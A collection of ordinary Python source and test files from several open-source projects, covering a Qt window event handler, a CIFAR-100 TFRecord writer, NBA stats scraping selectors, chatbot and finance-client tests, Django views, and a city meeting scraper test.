"""str: Window title.
This property can also be set::
window.title = "New Title"
"""
return self._title
@title.setter
def title(self, value: str):
self._widget.setWindowTitle(value)
self._title = value
def resize(self, width: int, height: int) -> None:
"""Replacement for Qt's ``resizeGL`` method.
Args:
width: New window width
height: New window height
"""
self._width = width // self._widget.devicePixelRatio()
self._height = height // self._widget.devicePixelRatio()
self._buffer_width = width
self._buffer_height = height
if self._ctx:
self.set_default_viewport()
# Make sure we notify the example about the resize
super().resize(self._buffer_width, self._buffer_height)
def _handle_modifiers(self, mods) -> None:
"""Update modifiers"""
self._modifiers.shift = bool(mods & QtCore.Qt.ShiftModifier)
self._modifiers.ctrl = bool(mods & QtCore.Qt.ControlModifier)
self._modifiers.alt = bool(mods & QtCore.Qt.AltModifier)
def _set_icon(self, icon_path: str) -> None:
self._widget.setWindowIcon(QtGui.QIcon(icon_path))
def key_pressed_event(self, event) -> None:
"""Process Qt key press events forwarding them to standard methods
Args:
event: The qtevent instance
"""
if self._exit_key is not None and event.key() == self._exit_key:
self.close()
if self._fs_key is not None and event.key() == self._fs_key:
self.fullscreen = not self.fullscreen
self._handle_modifiers(event.modifiers())
self._key_pressed_map[event.key()] = True
self._key_event_func(event.key(), self.keys.ACTION_PRESS, self._modifiers)
text = event.text()
if text.strip() or event.key() == self.keys.SPACE:
self._unicode_char_entered_func(text)
def key_release_event(self, event) -> None:
"""Process Qt key release events forwarding them to standard methods
Args:
event: The qtevent instance
"""
self._handle_modifiers(event.modifiers())
self._key_pressed_map[event.key()] = False
self._key_event_func(event.key(), self.keys.ACTION_RELEASE, self._modifiers)
def mouse_move_event(self, event) -> None:
"""Forward mouse cursor position events to standard methods
Args:
event: The qtevent instance
"""
x, y = event.x(), event.y()
dx, dy = self._calc_mouse_delta(x, y)
if self.mouse_states.any:
self._mouse_drag_event_func(x, y, dx, dy)
else:
self._mouse_position_event_func(x, y, dx, dy)
def mouse_press_event(self, event) -> None:
"""Forward mouse press events to standard methods
Args:
event: The qtevent instance
"""
self._handle_modifiers(event.modifiers())
button = self._mouse_button_map.get(event.button())
if button is None:
return
self._handle_mouse_button_state_change(button, True)
self._mouse_press_event_func(event.x(), event.y(), button)
def mouse_release_event(self, event) -> None:
"""Forward mouse release events to standard methods
Args:
event: The qtevent instance
"""
self._handle_modifiers(event.modifiers())
button = self._mouse_button_map.get(event.button())
if button is None:
return
self._handle_mouse_button_state_change(button, False)
self._mouse_release_event_func(event.x(), event.y(), button)
def mouse_wheel_event(self, event):
"""Forward mouse wheel events to standard metods.
From Qt docs:
Returns the distance that the wheel is rotated, in eighths of a degree.
A positive value indicates that the wheel was rotated forwards away from the user;
a negative value indicates that the wheel was rotated backwards toward the user.
Most mouse types work in steps of 15 degrees, in which case the delta value is a
multiple of 120; i.e., 120 units * 1/8 = 15 degrees.
However, some mice have finer-resolution wheels and send delta values that are less
than 120 units (less than 15 degrees). To support this possibility, you can either
cumulatively add the delta values from events until the value of 120 is reached,
then scroll the widget, or you can partially scroll the widget in response to each
wheel event.
Args:
event (QWheelEvent): Mouse wheel event
"""
self._handle_modifiers(event.modifiers())
point = event.angleDelta()
self._mouse_scroll_event_func(point.x() / 120.0, point.y() / 120.0)
def close_event(self, event) -> None:
"""The standard PyQt close events
Args:
event: The qtevent instance
"""
self.close()
def close(self):
"""Close the window"""
super().close()
self._close_func()
def show_event(self, event):
"""The standard Qt show event"""
self._iconify_func(False)
def hide_event(self, event):
"""The standard Qt hide event"""
self._iconify_func(True)
def destroy(self) -> None:
"""Quit the Qt application to exit the window gracefully"""
QtCore.QCoreApplication.instance().quit()
|
capslayer/data/datasets/cifar100/writer.py | ForkedReposBak/CapsLayer | 379 | 12740035 | # Copyright 2018 The CapsLayer Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==========================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
import tensorflow as tf
from tensorflow.python.keras.utils.data_utils import get_file
from tensorflow.python.keras.datasets.cifar import load_batch
from capslayer.data.utils.TFRecordHelper import int64_feature, bytes_feature
URL = "https://www.cs.toronto.edu/~kriz/cifar-100-python.tar.gz"
md5sum = 'eb9058c3a382ffc7106e4002c42a8d85'
def load_cifar100(split, path=None):
if path is None:
cache_path = os.path.join(os.path.expanduser('~'), ".capslayer")
path = get_file('cifar-100-python', cache_dir=cache_path, file_hash=md5sum, origin=URL, untar=True)
split = split.lower()
if split == 'test':
fpath = os.path.join(path, 'test')
images, labels = load_batch(fpath, label_key='fine_labels')
else:
fpath = os.path.join(path, 'train')
images, labels = load_batch(fpath, label_key='fine_labels')
idx = np.arange(len(images))
np.random.seed(201808)
np.random.shuffle(idx)
labels = np.reshape(labels, (-1, ))
images = images[idx[:45000]] if split == "train" else images[idx[45000:]]
labels = labels[idx[:45000]] if split == "train" else labels[idx[45000:]]
images = np.reshape(images.transpose(0, 2, 3, 1), (-1, 3072)).astype(np.float32)
labels = np.reshape(labels, (-1, )).astype(np.int32)
return(zip(images, labels))
def encode_and_write(dataset, filename):
with tf.python_io.TFRecordWriter(filename) as writer:
for image, label in dataset:
print(image.shape)
exit()
image_raw = image.tostring()
example = tf.train.Example(features=tf.train.Features(
feature={'image': bytes_feature(image_raw),
'label': int64_feature(label)}))
writer.write(example.SerializeToString())
def tfrecord_runner(path=None, force=True):
train_set = load_cifar100(path=path, split='train')
eval_set = load_cifar100(path=path, split='eval')
test_set = load_cifar100(path=path, split='test')
if path is None:
path = os.path.join(os.path.expanduser('~'), ".capslayer", "datasets", "cifar100")
if not os.path.exists(path):
os.makedirs(path)
train_set_outpath = os.path.join(path, "train_cifar100.tfrecord")
eval_set_outpath = os.path.join(path, "eval_cifar100.tfrecord")
test_set_outpath = os.path.join(path, "test_cifar100.tfrecord")
if not os.path.exists(train_set_outpath) or force:
encode_and_write(train_set, train_set_outpath)
if not os.path.exists(eval_set_outpath) or force:
encode_and_write(eval_set, eval_set_outpath)
if not os.path.exists(test_set_outpath) or force:
encode_and_write(test_set, test_set_outpath)
if __name__ == "__main__":
data = load_cifar100(split='train')
print(data)
|
sportsipy/nba/constants.py | MArtinherz/sportsipy | 221 | 12740050 | PARSING_SCHEME = {
'name': 'a',
'games_played': 'td[data-stat="g"]:first',
'minutes_played': 'td[data-stat="mp"]:first',
'field_goals': 'td[data-stat="fg"]:first',
'field_goal_attempts': 'td[data-stat="fga"]:first',
'field_goal_percentage': 'td[data-stat="fg_pct"]:first',
'three_point_field_goals': 'td[data-stat="fg3"]:first',
'three_point_field_goal_attempts': 'td[data-stat="fg3a"]:first',
'three_point_field_goal_percentage': 'td[data-stat="fg3_pct"]:first',
'two_point_field_goals': 'td[data-stat="fg2"]:first',
'two_point_field_goal_attempts': 'td[data-stat="fg2a"]:first',
'two_point_field_goal_percentage': 'td[data-stat="fg2_pct"]:first',
'free_throws': 'td[data-stat="ft"]:first',
'free_throw_attempts': 'td[data-stat="fta"]:first',
'free_throw_percentage': 'td[data-stat="ft_pct"]:first',
'offensive_rebounds': 'td[data-stat="orb"]:first',
'defensive_rebounds': 'td[data-stat="drb"]:first',
'total_rebounds': 'td[data-stat="trb"]:first',
'assists': 'td[data-stat="ast"]:first',
'steals': 'td[data-stat="stl"]:first',
'blocks': 'td[data-stat="blk"]:first',
'turnovers': 'td[data-stat="tov"]:first',
'personal_fouls': 'td[data-stat="pf"]:first',
'points': 'td[data-stat="pts"]:first',
'opp_minutes_played': 'td[data-stat="mp"]:first',
'opp_field_goals': 'td[data-stat="opp_fg"]:first',
'opp_field_goal_attempts': 'td[data-stat="opp_fga"]:first',
'opp_field_goal_percentage': 'td[data-stat="opp_fg_pct"]:first',
'opp_three_point_field_goals': 'td[data-stat="opp_fg3"]:first',
'opp_three_point_field_goal_attempts': 'td[data-stat="opp_fg3a"]:first',
'opp_three_point_field_goal_percentage':
'td[data-stat="opp_fg3_pct"]:first',
'opp_two_point_field_goals': 'td[data-stat="opp_fg2"]:first',
'opp_two_point_field_goal_attempts': 'td[data-stat="opp_fg2a"]:first',
'opp_two_point_field_goal_percentage': 'td[data-stat="opp_fg2_pct"]:first',
'opp_free_throws': 'td[data-stat="opp_ft"]:first',
'opp_free_throw_attempts': 'td[data-stat="opp_fta"]:first',
'opp_free_throw_percentage': 'td[data-stat="opp_ft_pct"]:first',
'opp_offensive_rebounds': 'td[data-stat="opp_orb"]:first',
'opp_defensive_rebounds': 'td[data-stat="opp_drb"]:first',
'opp_total_rebounds': 'td[data-stat="opp_trb"]:first',
'opp_assists': 'td[data-stat="opp_ast"]:first',
'opp_steals': 'td[data-stat="opp_stl"]:first',
'opp_blocks': 'td[data-stat="opp_blk"]:first',
'opp_turnovers': 'td[data-stat="opp_tov"]:first',
'opp_personal_fouls': 'td[data-stat="opp_pf"]:first',
'opp_points': 'td[data-stat="opp_pts"]:first'
}
SCHEDULE_SCHEME = {
'game': 'th[data-stat="g"]:first',
'date': 'td[data-stat="date_game"]:first',
'time': 'td[data-stat="game_start_time"]:first',
'boxscore': 'td[data-stat="box_score_text"]:first',
'location': 'td[data-stat="game_location"]:first',
'opponent_abbr': 'td[data-stat="opp_id"]:first',
'opponent_name': 'td[data-stat="opp_name"]:first',
'result': 'td[data-stat="game_result"]:first',
'points_scored': 'td[data-stat="pts"]:first',
'points_allowed': 'td[data-stat="opp_pts"]:first',
'wins': 'td[data-stat="wins"]:first',
'losses': 'td[data-stat="losses"]:first',
'streak': 'td[data-stat="game_streak"]:first'
}
BOXSCORE_SCHEME = {
'date': 'div[class="scorebox_meta"]',
'location': 'div[class="scorebox_meta"]',
'away_name': 'a[itemprop="name"]:first',
'home_name': 'a[itemprop="name"]:last',
'winning_name': '',
'winning_abbr': '',
'losing_name': '',
'losing_abbr': '',
'summary': 'table#line_score',
'pace': 'td[data-stat="pace"]:first',
'away_record': 'div[class="table_wrapper"] h2',
'away_minutes_played': 'tfoot td[data-stat="mp"]',
'away_field_goals': 'tfoot td[data-stat="fg"]',
'away_field_goal_attempts': 'tfoot td[data-stat="fga"]',
'away_field_goal_percentage': 'tfoot td[data-stat="fg_pct"]',
'away_two_point_field_goals': 'tfoot td[data-stat="fg2"]',
'away_two_point_field_goal_attempts': 'tfoot td[data-stat="fg2a"]',
'away_two_point_field_goal_percentage': 'tfoot td[data-stat="fg2_pct"]',
'away_three_point_field_goals': 'tfoot td[data-stat="fg3"]',
'away_three_point_field_goal_attempts': 'tfoot td[data-stat="fg3a"]',
'away_three_point_field_goal_percentage': 'tfoot td[data-stat="fg3_pct"]',
'away_free_throws': 'tfoot td[data-stat="ft"]',
'away_free_throw_attempts': 'tfoot td[data-stat="fta"]',
'away_free_throw_percentage': 'tfoot td[data-stat="ft_pct"]',
'away_offensive_rebounds': 'tfoot td[data-stat="orb"]',
'away_defensive_rebounds': 'tfoot td[data-stat="drb"]',
'away_total_rebounds': 'tfoot td[data-stat="trb"]',
'away_assists': 'tfoot td[data-stat="ast"]',
'away_steals': 'tfoot td[data-stat="stl"]',
'away_blocks': 'tfoot td[data-stat="blk"]',
'away_turnovers': 'tfoot td[data-stat="tov"]',
'away_personal_fouls': 'tfoot td[data-stat="pf"]',
'away_points': 'tfoot td[data-stat="pts"]',
'away_true_shooting_percentage': 'tfoot td[data-stat="ts_pct"]',
'away_effective_field_goal_percentage': 'tfoot td[data-stat="efg_pct"]',
'away_three_point_attempt_rate': 'tfoot td[data-stat="fg3a_per_fga_pct"]',
'away_free_throw_attempt_rate': 'tfoot td[data-stat="fta_per_fga_pct"]',
'away_offensive_rebound_percentage': 'tfoot td[data-stat="orb_pct"]',
'away_defensive_rebound_percentage': 'tfoot td[data-stat="drb_pct"]',
'away_total_rebound_percentage': 'tfoot td[data-stat="trb_pct"]',
'away_assist_percentage': 'tfoot td[data-stat="ast_pct"]',
'away_steal_percentage': 'tfoot td[data-stat="stl_pct"]',
'away_block_percentage': 'tfoot td[data-stat="blk_pct"]',
'away_turnover_percentage': 'tfoot td[data-stat="tov_pct"]',
'away_offensive_rating': 'tfoot td[data-stat="off_rtg"]',
'away_defensive_rating': 'tfoot td[data-stat="def_rtg"]',
'home_record': 'div[class="table_wrapper"] h2',
'home_minutes_played': 'tfoot td[data-stat="mp"]',
'home_field_goals': 'tfoot td[data-stat="fg"]',
'home_field_goal_attempts': 'tfoot td[data-stat="fga"]',
'home_field_goal_percentage': 'tfoot td[data-stat="fg_pct"]',
'home_two_point_field_goals': 'tfoot td[data-stat="fg2"]',
'home_two_point_field_goal_attempts': 'tfoot td[data-stat="fg2a"]',
'home_two_point_field_goal_percentage': 'tfoot td[data-stat="fg2_pct"]',
'home_three_point_field_goals': 'tfoot td[data-stat="fg3"]',
'home_three_point_field_goal_attempts': 'tfoot td[data-stat="fg3a"]',
'home_three_point_field_goal_percentage': 'tfoot td[data-stat="fg3_pct"]',
'home_free_throws': 'tfoot td[data-stat="ft"]',
'home_free_throw_attempts': 'tfoot td[data-stat="fta"]',
'home_free_throw_percentage': 'tfoot td[data-stat="ft_pct"]',
'home_offensive_rebounds': 'tfoot td[data-stat="orb"]',
'home_defensive_rebounds': 'tfoot td[data-stat="drb"]',
'home_total_rebounds': 'tfoot td[data-stat="trb"]',
'home_assists': 'tfoot td[data-stat="ast"]',
'home_steals': 'tfoot td[data-stat="stl"]',
'home_blocks': 'tfoot td[data-stat="blk"]',
'home_turnovers': 'tfoot td[data-stat="tov"]',
'home_personal_fouls': 'tfoot td[data-stat="pf"]',
'home_points': 'div[class="score"]',
'home_true_shooting_percentage': 'tfoot td[data-stat="ts_pct"]',
'home_effective_field_goal_percentage': 'tfoot td[data-stat="efg_pct"]',
'home_three_point_attempt_rate': 'tfoot td[data-stat="fg3a_per_fga_pct"]',
'home_free_throw_attempt_rate': 'tfoot td[data-stat="fta_per_fga_pct"]',
'home_offensive_rebound_percentage': 'tfoot td[data-stat="orb_pct"]',
'home_defensive_rebound_percentage': 'tfoot td[data-stat="drb_pct"]',
'home_total_rebound_percentage': 'tfoot td[data-stat="trb_pct"]',
'home_assist_percentage': 'tfoot td[data-stat="ast_pct"]',
'home_steal_percentage': 'tfoot td[data-stat="stl_pct"]',
'home_block_percentage': 'tfoot td[data-stat="blk_pct"]',
'home_turnover_percentage': 'tfoot td[data-stat="tov_pct"]',
'home_offensive_rating': 'tfoot td[data-stat="off_rtg"]',
'home_defensive_rating': 'tfoot td[data-stat="def_rtg"]'
}
BOXSCORE_ELEMENT_INDEX = {
'date': 0,
'location': 1,
'home_record': -1,
'home_minutes_played': 7,
'home_field_goals': 7,
'home_field_goal_attempts': 7,
'home_field_goal_percentage': 7,
'home_two_point_field_goals': 7,
'home_two_point_field_goal_attempts': 7,
'home_two_point_field_goal_percentage': 7,
'home_three_point_field_goals': 7,
'home_three_point_field_goal_attempts': 7,
'home_three_point_field_goal_percentage': 7,
'home_free_throws': 7,
'home_free_throw_attempts': 7,
'home_free_throw_percentage': 7,
'home_offensive_rebounds': 7,
'home_defensive_rebounds': 7,
'home_total_rebounds': 7,
'home_assists': 7,
'home_steals': 7,
'home_blocks': 7,
'home_turnovers': 7,
'home_personal_fouls': 7,
'home_points': -1,
'home_true_shooting_percentage': 7,
'home_effective_field_goal_percentage': 7,
'home_three_point_attempt_rate': 7,
'home_free_throw_attempt_rate': 7,
'home_offensive_rebound_percentage': 7,
'home_defensive_rebound_percentage': 7,
'home_total_rebound_percentage': 7,
'home_assist_percentage': 7,
'home_steal_percentage': 7,
'home_block_percentage': 7,
'home_turnover_percentage': 7,
'home_offensive_rating': 7,
'home_defensive_rating': 7
}
PLAYER_SCHEME = {
'summary': '[data-template="Partials/Teams/Summary"]',
'season': 'th[data-stat="season"]:first',
'name': 'h1',
'team_abbreviation': 'td[data-stat="team_id"]',
'position': 'td[data-stat="pos"]',
'height': 'span[itemprop="height"]',
'weight': 'span[itemprop="weight"]',
'birth_date': 'td[data-stat=""]',
'nationality': 'td[data-stat=""]',
'age': 'nobr',
'games_played': 'td[data-stat="g"]',
'games_started': 'td[data-stat="gs"]',
'minutes_played': 'td[data-stat="mp"]',
'field_goals': 'td[data-stat="fg"]',
'field_goal_attempts': 'td[data-stat="fga"]',
'field_goal_percentage': 'td[data-stat="fg_pct"]',
'three_pointers': 'td[data-stat="fg3"]',
'three_point_attempts': 'td[data-stat="fg3a"]',
'three_point_percentage': 'td[data-stat="fg3_pct"]',
'two_pointers': 'td[data-stat="fg2"]',
'two_point_attempts': 'td[data-stat="fg2a"]',
'two_point_percentage': 'td[data-stat="fg2_pct"]',
'effective_field_goal_percentage': 'td[data-stat="efg_pct"]',
'free_throws': 'td[data-stat="ft"]',
'free_throw_attempts': 'td[data-stat="fta"]',
'free_throw_percentage': 'td[data-stat="ft_pct"]',
'offensive_rebounds': 'td[data-stat="orb"]',
'defensive_rebounds': 'td[data-stat="drb"]',
'total_rebounds': 'td[data-stat="trb"]',
'assists': 'td[data-stat="ast"]',
'steals': 'td[data-stat="stl"]',
'blocks': 'td[data-stat="blk"]',
'turnovers': 'td[data-stat="tov"]',
'personal_fouls': 'td[data-stat="pf"]',
'points': 'td[data-stat="pts"]',
'player_efficiency_rating': 'td[data-stat="per"]',
'true_shooting_percentage': 'td[data-stat="ts_pct"]',
'three_point_attempt_rate': 'td[data-stat="fg3a_per_fga_pct"]',
'free_throw_attempt_rate': 'td[data-stat="fta_per_fga_pct"]',
'offensive_rebound_percentage': 'td[data-stat="orb_pct"]',
'defensive_rebound_percentage': 'td[data-stat="drb_pct"]',
'total_rebound_percentage': 'td[data-stat="trb_pct"]',
'assist_percentage': 'td[data-stat="ast_pct"]',
'steal_percentage': 'td[data-stat="stl_pct"]',
'block_percentage': 'td[data-stat="blk_pct"]',
'turnover_percentage': 'td[data-stat="tov_pct"]',
'usage_percentage': 'td[data-stat="usg_pct"]',
'offensive_win_shares': 'td[data-stat="ows"]',
'defensive_win_shares': 'td[data-stat="dws"]',
'win_shares': 'td[data-stat="ws"]',
'win_shares_per_48_minutes': 'td[data-stat="ws_per_48"]',
'offensive_box_plus_minus': 'td[data-stat="obpm"]',
'defensive_box_plus_minus': 'td[data-stat="dbpm"]',
'box_plus_minus': 'td[data-stat="bpm"]',
'defensive_rating': 'td[data-stat="def_rtg"]',
'offensive_rating': 'td[data-stat="off_rtg"]',
'boxscore_box_plus_minus': 'td[data-stat="plus_minus"]',
'value_over_replacement_player': 'td[data-stat="vorp"]',
'shooting_distance': 'td[data-stat="avg_dist"]',
'percentage_shots_two_pointers': 'td[data-stat="fg2a_pct_fga"]',
'percentage_zero_to_three_footers': 'td[data-stat="pct_fga_00_03"]',
'percentage_three_to_ten_footers': 'td[data-stat="pct_fga_03_10"]',
'percentage_ten_to_sixteen_footers': 'td[data-stat="pct_fga_10_16"]',
'percentage_sixteen_foot_plus_two_pointers':
'td[data-stat="pct_fga_16_xx"]',
'percentage_shots_three_pointers': 'td[data-stat="fg3a_pct_fga"]',
'field_goal_perc_zero_to_three_feet': 'td[data-stat="fg_pct_00_03"]',
'field_goal_perc_three_to_ten_feet': 'td[data-stat="fg_pct_03_10"]',
'field_goal_perc_ten_to_sixteen_feet': 'td[data-stat="fg_pct_10_16"]',
'field_goal_perc_sixteen_foot_plus_two_pointers':
'td[data-stat="fg_pct_16_xx"]',
'two_pointers_assisted_percentage': 'td[data-stat="fg2_pct_ast"]',
'percentage_field_goals_as_dunks': 'td[data-stat="pct_fg2_dunk"]',
'dunks': 'td[data-stat="fg2_dunk"]',
'three_pointers_assisted_percentage': 'td[data-stat="fg3_pct_ast"]',
'percentage_of_three_pointers_from_corner':
'td[data-stat="pct_fg3a_corner"]',
'three_point_shot_percentage_from_corner':
'td[data-stat="fg3_pct_corner"]',
'half_court_heaves': 'td[data-stat="fg3a_heave"]',
'half_court_heaves_made': 'td[data-stat="fg3_heave"]',
'point_guard_percentage': 'td[data-stat="pct_1"]',
'shooting_guard_percentage': 'td[data-stat="pct_2"]',
'small_forward_percentage': 'td[data-stat="pct_3"]',
'power_forward_percentage': 'td[data-stat="pct_4"]',
'center_percentage': 'td[data-stat="pct_5"]',
'on_court_plus_minus': 'td[data-stat="plus_minus_on"]',
'net_plus_minus': 'td[data-stat="plus_minus_net"]',
'passing_turnovers': 'td[data-stat="tov_bad_pass"]',
'lost_ball_turnovers': 'td[data-stat="tov_lost_ball"]',
'other_turnovers': 'td[data-stat="tov_other"]',
'shooting_fouls': 'td[data-stat="fouls_shooting"]',
'blocking_fouls': 'td[data-stat="fouls_blocking"]',
'offensive_fouls': 'td[data-stat="fouls_offensive"]',
'take_fouls': 'td[data-stat="fouls_take"]',
'points_generated_by_assists': 'td[data-stat="astd_pts"]',
'shooting_fouls_drawn': 'td[data-stat="drawn_shooting"]',
'and_ones': 'td[data-stat="and1s"]',
'shots_blocked': 'td[data-stat="fga_blkd"]',
'salary': 'td[data-stat="salary"]',
'field_goals_per_poss': 'td[data-stat="fg_per_poss"]',
'field_goal_attempts_per_poss': 'td[data-stat="fga_per_poss"]',
'three_pointers_per_poss': 'td[data-stat="fg3_per_poss"]',
'three_point_attempts_per_poss': 'td[data-stat="fg3a_per_poss"]',
'two_pointers_per_poss': 'td[data-stat="fg2_per_poss"]',
'two_point_attempts_per_poss': 'td[data-stat="fg2a_per_poss"]',
'free_throws_per_poss': 'td[data-stat="ft_per_poss"]',
'free_throw_attempts_per_poss': 'td[data-stat="fta_per_poss"]',
'offensive_rebounds_per_poss': 'td[data-stat="orb_per_poss"]',
'defensive_rebounds_per_poss': 'td[data-stat="drb_per_poss"]',
'total_rebounds_per_poss': 'td[data-stat="trb_per_poss"]',
'assists_per_poss': 'td[data-stat="ast_per_poss"]',
'steals_per_poss': 'td[data-stat="stl_per_poss"]',
'blocks_per_poss': 'td[data-stat="blk_per_poss"]',
'turnovers_per_poss': 'td[data-stat="tov_per_poss"]',
'personal_fouls_per_poss': 'td[data-stat="pf_per_poss"]',
'points_per_poss': 'td[data-stat="pts_per_poss"]'
}
NATIONALITY = {
'ao': 'Angola',
'ag': 'Antigua and Barbuda',
'ar': 'Argentina',
'au': 'Australia',
'at': 'Austria',
'bs': 'Bahamas',
'be': 'Belgium',
'ba': 'Bosnia and Herzegovina',
'br': 'Brazil',
'bg': 'Bulgaria',
'cm': 'Cameroon',
'ca': 'Canada',
'td': 'Chad',
'co': 'Colombia',
'cv': 'Cape Verde',
'cn': 'China',
'hr': 'Croatia',
'cu': 'Cuba',
'cz': 'Czech Republic',
'cd': 'Democratic Replubic of Congo',
'dk': 'Denmark',
'dm': 'Dominica',
'do': 'Dominican Replubic',
'eg': 'Egypt',
'ee': 'Estonia',
'fi': 'Finland',
'fr': 'France',
'gf': 'French Guiana',
'ga': 'Gabon',
'ge': 'Georgia',
'de': 'Germany',
'gh': 'Ghana',
'gr': 'Greece',
'gp': 'Guadeloupe',
'gn': 'Guinea',
'gy': 'Guyana',
'ht': 'Haiti',
'hu': 'Hungary',
'is': 'Iceland',
'ie': 'Ireland',
'ir': 'Islamic Replubic of Iran',
'il': 'Israel',
'it': 'Italy',
'jm': 'Jamaica',
'jp': 'Japan',
'lv': 'Latvia',
'lb': 'Lebanon',
'lt': 'Lithuania',
'lu': 'Luxembourg',
'ml': 'Mali',
'mq': 'Martinique',
'mx': 'Mexico',
'me': 'Montenegro',
'ma': 'Morocco',
'nl': 'Netherlands',
'nz': 'New Zealand',
'ng': 'Nigeria',
'no': 'Norway',
'pa': 'Panama',
'pl': 'Poland',
'pr': 'Puerto Rico',
'ke': 'Kenya',
'kr': 'Republic of Korea',
'mk': 'Republic of Macedonia',
'cg': 'Republic of Congo',
'ro': 'Romania',
'ru': 'Russian Federation',
'lc': 'Saint Lucia',
'vc': 'Saint Vincent and the Grenadines',
'sd': 'Sudan',
'sn': 'Senegal',
'rs': 'Serbia',
'sk': 'Slovakia',
'si': 'Slovenia',
'za': 'South Africa',
'ss': 'South Sudan',
'es': 'Spain',
'se': 'Sweden',
'ch': 'Switzerland',
'tw': 'Taiwan',
'tt': 'Trinidad and Tobago',
'tn': 'Tunisia',
'tr': 'Turkey',
'us': 'United States of America',
'vi': 'U.S. Virgin Islands',
'ua': 'Ukraine',
'gb': 'United Kingdom',
'tz': 'United Republic of Tanzania',
'uy': 'Uruguay',
've': 'Venezuela'
}
SEASON_PAGE_URL = 'http://www.basketball-reference.com/leagues/NBA_%s.html'
SCHEDULE_URL = 'http://www.basketball-reference.com/teams/%s/%s_games.html'
BOXSCORE_URL = 'https://www.basketball-reference.com/boxscores/%s.html'
BOXSCORES_URL = ('https://www.basketball-reference.com/boxscores/'
'?month=%s&day=%s&year=%s')
PLAYER_URL = 'https://www.basketball-reference.com/players/%s/%s.html'
ROSTER_URL = 'https://www.basketball-reference.com/teams/%s/%s.html'
|
tests/test_assistant.py | y226xie/flask-assistant | 400 | 12740062 | <gh_stars>100-1000
from flask_assistant.manager import Context
from tests.helpers import build_payload, get_query_response
def test_intents_with_different_formatting(simple_client, intent_payload):
resp = get_query_response(simple_client, intent_payload)
assert "Message" in resp["fulfillmentText"]
resp = simple_client.post("/", data=intent_payload)
assert resp.status_code == 200
assert b"Message" in resp.data
def test_add_context_to_response(context_assist):
client = context_assist.app.test_client()
payload = build_payload("AddContext")
resp = get_query_response(client, payload)
# full_name = f"projects/{context_assist._project_id}/agent/sessions/{context_assist.session_id}/contexts/SampleContext"
# context_item = {"lifespanCount": 5, "name": full_name, "parameters": {}}
# TODO access context_manager from assist, check for full context name
assert "SampleContext" in resp["outputContexts"][0]["name"]
# assert context_item in resp["outputContexts"]
def test_add_context_to_manager(context_assist):
# with statement allows context locals to be accessed
# remains within the actual request to the flask app
with context_assist.app.test_client() as client:
payload = build_payload("AddContext")
resp = get_query_response(client, payload)
context_obj = Context("SampleContext")
assert context_obj in context_assist.context_manager.active
# def test_need_context_to_match_action(context_assist):
# with context_assist.app.test_client() as client:
# payload = build_payload('ContextRequired')
# resp = get_query_response(client, payload)
# assert 'Matched because SampleContext was active' not in resp['speech']
def test_docs_context(docs_assist):
# adds 'vegetarian' context
with docs_assist.app.test_client() as client:
payload = build_payload("give-diet", params={"diet": "vegetarian"})
resp = get_query_response(client, payload)
context_obj = Context("vegetarian")
assert context_obj in docs_assist.context_manager.active
next_payload = build_payload("get-food", contexts=resp["outputContexts"])
next_resp = get_query_response(client, next_payload)
assert "farmers market" in next_resp["fulfillmentText"]
# adds 'carnivore' context
with docs_assist.app.test_client() as client:
payload = build_payload("give-diet", params={"diet": "carnivore"})
resp = get_query_response(client, payload)
context_obj = Context("carnivore")
assert context_obj in docs_assist.context_manager.active
next_payload = build_payload("get-food", contexts=resp["outputContexts"])
next_resp = get_query_response(client, next_payload)
assert "farmers market" not in next_resp["fulfillmentText"]
assert "BBQ" in next_resp["fulfillmentText"]
|
tests/account.py | chaserhkj/ofxclient | 219 | 12740099 | <gh_stars>100-1000
import unittest
from ofxclient import Account
from ofxclient import BankAccount
from ofxclient import BrokerageAccount
from ofxclient import CreditCardAccount
from ofxclient import Institution
class OfxAccountTests(unittest.TestCase):
def setUp(self):
institution = Institution(
id='1',
org='Example',
url='http://example.com',
username='username',
password='password'
)
self.institution = institution
def testNumberRequired(self):
a = {'institution': self.institution}
self.assertRaises(TypeError, Account, **a)
def testInstitutionRequired(self):
a = {'number': '12345'}
self.assertRaises(TypeError, Account, **a)
def testMasked(self):
account = Account(
number='12345',
institution=self.institution
)
self.assertEqual(account.number_masked(), '***2345')
account.number = '1234'
self.assertEqual(account.number_masked(), '***1234')
account.number = '123'
self.assertEqual(account.number_masked(), '***123')
account.number = '12'
self.assertEqual(account.number_masked(), '***12')
account.number = '1'
self.assertEqual(account.number_masked(), '***1')
def testDescription(self):
account = Account(
number='12345',
institution=self.institution
)
self.assertEqual(
account.description,
'***2345',
'kwarg is not required and defaults')
account = Account(
number='12345',
institution=self.institution,
description=None
)
self.assertEqual(account.description, '***2345', 'None defaults')
account = Account(
number='12345',
institution=self.institution,
description=''
)
self.assertEqual(
account.description,
'***2345',
'empty string desc defaults')
account = Account(
number='12345',
institution=self.institution,
description='0'
)
self.assertEqual(account.description, '0', '0 string is preserved')
account = Account(
number='12345',
institution=self.institution,
description='passed'
)
self.assertEqual(account.description, 'passed')
def testNoInstitution(self):
account = Account(
number='12345',
institution=None
)
|
newtest/views.py | judexzhu/dzhops | 202 | 12740143 | <reponame>judexzhu/dzhops
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
# Create your views here.
@login_required
def testHtml(request):
user = request.user.username
return render(
request,
'test.html'
)
@login_required
def testIndex(request):
user = request.user.username
return render(
request,
'anew/index.html'
) |
tests/test_chi_ssa_24.py | MAYANK25402/city-scrapers | 255 | 12740160 | <filename>tests/test_chi_ssa_24.py
from datetime import datetime
from os.path import dirname, join
import pytest # noqa
from city_scrapers_core.constants import COMMISSION, PASSED
from city_scrapers_core.utils import file_response
from freezegun import freeze_time
from city_scrapers.spiders.chi_ssa_24 import ChiSsa24Spider
test_response = file_response(
join(dirname(__file__), "files", "chi_ssa_24.html"), url="https://rpba.org/ssa-24/",
)
test_detail_response = file_response(
join(dirname(__file__), "files", "chi_ssa_24_detail.html"),
url=(
"https://business.rpba.org/events/details/clark-morse-glenwood-ssa-24-commissioners-meeting-6355" # noqa
),
)
spider = ChiSsa24Spider()
freezer = freeze_time("2019-12-10")
freezer.start()
spider.link_date_map = spider._parse_links(test_response)
parsed_item = [item for item in spider._parse_detail(test_detail_response)][0]
freezer.stop()
